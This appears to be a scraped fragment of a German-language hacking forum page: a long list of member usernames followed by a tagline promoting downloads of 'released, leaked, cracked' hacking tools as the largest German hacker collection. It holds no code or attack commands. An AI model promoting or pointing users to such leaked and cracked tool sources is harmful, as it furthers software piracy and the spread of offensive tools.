    , , _)_, _asmo_, -b4ck, .com, .Puma, #LEGACY, 0ABlemessi, 0day*, 0x7E1, 133TFoX, 13eprx37, 13General37, 1x1, 3699n, 3eyes, 3xc3ll3nt, abuleyla, ADIKAN, alcapwn, alienware2015, Alpha63, Alsuna, alterego-59, arttuki, asdfghjk9, Avni, b0kerst3l, B1nary, baba yugo, Bad Grandpa, Barney1, Bbahd300, bbxhnr, Beschorner89, biosmanp, bizar, Blackhook, Blackrock, blacksubmarine, BlackZetsu, Bloodman, Boneau, bones, Bot4ng, breidi59, brilla, brucereed64, bruuzopnik, bumg2, Bypass, ByteLSX, c3rberus, caballo, Caruso, casamonica, cazanova163, cdcl, Ch!ller, Chillemille2612, chimchoca7, Cockstar, coketroll, corkscrew, cr0ssload, craazzzzzy, Cranky, Crap, Crunshy, Cube, cubik, Cyber Tjak, cyberbitch, D3n1s230290, D3n1z, daredevil_hellfire207, DarkBlade, DarKdb, darkman36, darknide, Dean36, dev-0, dos, Dr. Spic, DR.zydz, DreamSeller, Drived211v2, drukoz, DupyLone, dvalar, easysurfer, elit3, Emalik Xantier, Emergencybuddy, Erikson, eXalT, fake2pay, FakeKeyUser, FalkE, fluffybunny, FlyestBoii, Framerater, freaky85, Frecy, frederiko, funstyler, G0rki, Giganet, god001, Godlike2k, Goooofy, gutzuu, hacked, hackEmcee, Hardwxre, Haxlor, Haymac, holz96, hootzoo, Husti_nett, Hydr0x1, ice, IceCracKer, IceWolfBiH, imp3danz, Injection, Invicible, Irhabi, iShiZo, iSplash0, Izon, jabba, Jackdaniels, jacktha, jackzett, Jauteng, jcwolf21, jinx, johntheawe, jonk, jut4h.tm, Kanbi, keyb0ardz, kig0, KiiNGDeZz, kingcrackzzz, kiwitone, klaudius, Koffee, ktkoti, L!x, L0KK0, L33toe, lamaamala, len0, leon, leonalexkraus, lion., Logitech, lolorollo, Lopus, m0nk3y, man, Mantrayana, mantwohouse, Manzer, mashok, Maxh, mettbrot, MiD_NiGHT, Mikky, Mini Rick, mrcomgame, MrElliwood, mrundercover, mrv, mrx666, MuesliChabo, n1nja, Neonxen, Nexus88, nightrelax, NightSys, nikez, nikita, Nissan300zx, nninja, nong_dan, notfound, nykshay, nyv, Osed28, PadX18, PaulaAbdul, paulaner, PCFreak24, pdr0, Ph@ntom, Phesii, phoenixx592, pi^2, ping-exit, Platon666, predator, pwcca, PyTh@n, Qjx1337, qwertz4321, R3s1stanc3, rat123, redcore, redrom696, Revelead, Rigger, rockito, Ruthless, s3ff, Sandoz, SAR, Sash1, SativaBreatha, SavE1, Sayco, Schakal, scrack, secretary, Seldos, selfcut, shado7, Sharky, shiznith, Shqipenet, Silasge, Silent0wn3r, Simple, Sinned, sitb, smc2014, Snapfish, snippa, someuser1, SonicBoom, SonnyBlack, SpySDar, sqiNNi, SSnack, st4rm, stoneserv, subtleopt, Sukaro, sup3ria, superuser123, syrius, T00LStar, T0NY, Take1T, TeamSploit, TechVPN, Teeworst, terratec1991, Th3xploiterZ, thanh109, the.3nd, thistime, tianchrispro, tingle, Toskom4n, tryfornew33, TuttiFrutti, Tw0F1sh, twixeis, ueEqlL, Ufonautas, umarex, vally, viertel97, viyiper, wbx32, will, x i n, x1337x, x1z0ng, Xantar, Xenio, xibit, xLizard, xoro, xVirtu, xxas, xxxsmackxxx, y2w, Z3LuX, Zahoor, zepsus, zer0kay, Zerobyte, Zlappost837, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.